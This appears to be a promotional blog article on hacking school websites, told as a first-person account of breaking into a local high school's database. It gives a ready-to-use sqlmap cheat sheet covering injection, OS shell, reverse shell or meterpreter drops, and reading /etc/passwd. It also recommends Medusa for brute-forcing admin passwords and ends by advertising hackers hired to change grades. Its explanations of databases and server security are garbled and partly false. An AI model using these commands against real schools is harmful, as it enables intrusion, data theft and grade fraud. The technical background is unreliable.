Hacking School website for fun and profit
Introduction
When I was a kid, the only computer I knew was my mom’s Macintosh. It was used solely for watching Cartoon and playing Solitaire. It wasn’t until high school that I realized computers were more than glorified televisions, they could be used to hack into things like school websites!
I remember the day when I found out that my school’s website was vulnerable to SQL injections. It was easy to do, all I had to do was add a single quote mark to the URL in my browser. The page immediately crashed, and I knew that this meant there were vulnerabilities in their database server.
In the past, hacking school websites was a great way to pass the time for bored teenagers. The problem is that it has become a lot more difficult in recent years. Nowadays, school web servers are set up differently from what they used to be. This makes it harder for a beginner to hack them.
What is a school web server?
School servers are the backbone of any school. They are used to manage the school’s network, communications, and applications to the students. They also allow teachers to access their grades and other information in real-time. A normal school website is protected by a firewall that prevents unauthorized access from outsiders. However, there are many ways to hack into a school server even if it’s protected by a firewall.
First, let’s talk about what makes up a server.
A server is basically just a computer with one or more processors running software that acts as an interface between your browser and the data stored on disks in its memory. This means that when you visit a website, it doesn’t just “appear” out of thin air, it actually has to be located somewhere in cyberspace (the Internet).
A school server is a computer that runs the school’s web-based applications and services. The server provides a central platform for storing, processing, and providing access to information about students, staff, and other users. It manages the authentication of user identities and controls access rights to electronic resources.
A school server is made up of many different parts. The most important part of a school server is the web server, which is what allows teachers and students to access information about their classes and assignments online. The other parts include email servers, which allow teachers and students to send messages back and forth; file servers, which store documents; and database servers, which store data like grades or attendance records (this information can be accessed via the web).
School servers have become more popular in recent years because many schools have moved away from paper-based grading systems and are now using electronic ones instead—meaning that they need an effective way of storing that data digitally.
Database defined
Databases are structured collections of structured data typically stored electronically on computers. Database control typically occurs through database management systems or databases. Together data and DBMS along with applications associated with them are often called databases or simply database systems, sometimes called databases.
Data within the most commonly used type of database in operation today are modeled by row or column tables to simplify processing and data queries. This information is then easily accessible, analyzed, and organized for the user.
What is a database management system?
A DBMS enables users to create and manage a database. It also helps users create, read, update and delete data in a database, and it assists with logging and auditing functions. The DBMS provides physical and logical operations such as performance monitoring, tuning, and backup and recovery.
Some examples of popular database software or DBMSs include MySQL, Microsoft Access, Microsoft SQL Server, FileMaker Pro, Oracle Database, and dBASE.
Different types of databases vary in the schema, data structure, and data types most suited to them, they are all comprised of the same five basic components.
Hardware: This is the physical device that database software runs on. Database hardware includes computers, servers, and hard drives.
Software: Database software or application gives users control of the database.
Database management system: (DBMS) software is used to manage and control databases.
Data: This is the raw information that the database stores. Database administrators organize the data to make it more meaningful.
Data access language: This is self-driving databases (also known as autonomous databases) are cloud-based and use machine learning to automate database tuning, security, backups, updates, and other routine management tasks traditionally performed by database administrators.
What is a MySQL database?
MySQL consists primarily of relational data storage based primarily on relational databases using SQL Server. It has been developed and optimized for web applications and is compatible with almost every platform. With internet changes, MySQL became a leading Web development and application platform because it’s designed to process millions of queries and tables.
These are indexed to make it easier to search using SQL or NoSQL queries. MySQL is an ideal solution for a school that houses departments. MySQL offers flexible on-demand functionality. MySQL is the main database server used for the creation of many of the top websites and applications in the world.
Relational databases use SQL in their user and application program interfaces. A new data category can easily be added to a relational database without having to change the existing applications.
A relational database management system (RDBMS) is used to store, manage, query, and retrieve data in a relational database. Typically, the RDBMS gives users the ability to control read/write access, specify report generation and analyze use.
How secure are school web servers?
The security of your school server relies on two main factors: its design and configuration. The first factor depends on the type of operating system used by your server (e.g., Windows or Linux). While Windows servers tend to be
more vulnerable than Linux ones, both are susceptible to attacks from hackers who want to gain access to sensitive information stored on them.
The second factor is related to how you configure your server’s security settings. For example, if you enable remote desktop connections then anyone can log into it remotely through a virtual private network (VPN) connection without needing any form of authentication whatsoever.
This means that even if someone has gained unauthorized access through another means such as brute force attack or SQL injection then they will still be able to connect using this method without being noticed by other users who might otherwise notice if someone else tried logging in from an unknown IP address via SSH
Hacking school websites
I was a little nervous about my first hack. The target was a local high school, and I’d been reading up on how to protect against breaches like mine. After all, every school has its own system for keeping track of students and teachers, and if you can get into the system, you can change records or even erase them completely.
But I knew what I had to do: find out as much as I could about the school’s web server before actually trying anything on it.
At first, I wanted to see how they were tracking students’ grades and attendance. Then, I got more interested in learning how to use their database. I wanted more power over the system.
Getting to know my target;
Fingerprinting technologies behind a webserver are used to identify the operating system, browser type and version, and even your operating system version. This information can then be used by hackers to figure out which exploits will work best against your particular website.
There are many tools for recon on the web designed for use against school servers. One of my favorites is Shodan because it provides me with all kinds of useful information about my target site, including open ports. The goal was to find security vulnerabilities in the school’s website and exploit them.
Their server was running outdated Apache software, which made it vulnerable to many known exploits. I also scanned for any vulnerabilities that could be exploited through SQL injection attacks or authentication bypass errors.
The next step was to exploit the know vulnerabilities on the website using sqlmap. It didn’t take me long to find an SQL injection flaw in one of its pages, which allowed me to execute arbitrary SQL queries on the database without authentication. That would be enough for most hackers but not for me because I was looking for something more challenging than just gaining access to their database system alone.
So the next thing I did was to scan their site for hidden directories and directories that might contain files with sensitive information, such as passwords or other credentials using dirbuster, and found one that contained database backups. The backup directory had SQL injections in two files, so I exploited them using sqlmap.
What is sqlmap used for?
SQLMap is a tool for the detection of SQL injection vulnerability. DatabaseMap automates identifying and exploiting SQL injections. Using SQL injections, an attacker can get in on a database using SQL.
useful commands worth sharing;
GET Request Injection
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
POST Request Injection
sqlmap -u "http://example.com" --data "username=*&password=*"
Injections in Headers and other HTTP Methods
Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
Indicate string when injection is successful
--string="string_showed_when_TRUE"
Eval
Sqlmap allows the use of -e or --eval to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the flask cookie session is signed by flask with the known secret before sending it:
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
Shell
Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
Read File
--file-read=/etc/passwd
Crawl a website with SQLmap and auto-exploit
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
Second Order Injection
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php"
Using Medusa to brute force admin password
Medusa is one of the best online brute-force, speedy, parallel password crackers, and ethical hacking tools. This hacking toolkit is also widely used for ethical hacking. Features: It is designed in such a way that it is speedy, massively parallel, modular, and login brute-forcer.
The main aim of this hacker software is to support as many services which allow remote authentication It is one of the best online hacking tools that allow performing thread-based parallel testing and Brute-force testing with Flexible user input.
How to Change Your Grades Online Forever When hacking; Employing ethical hackers to hack your university website will save you the difficulty of doing it without anyone’s assistance.
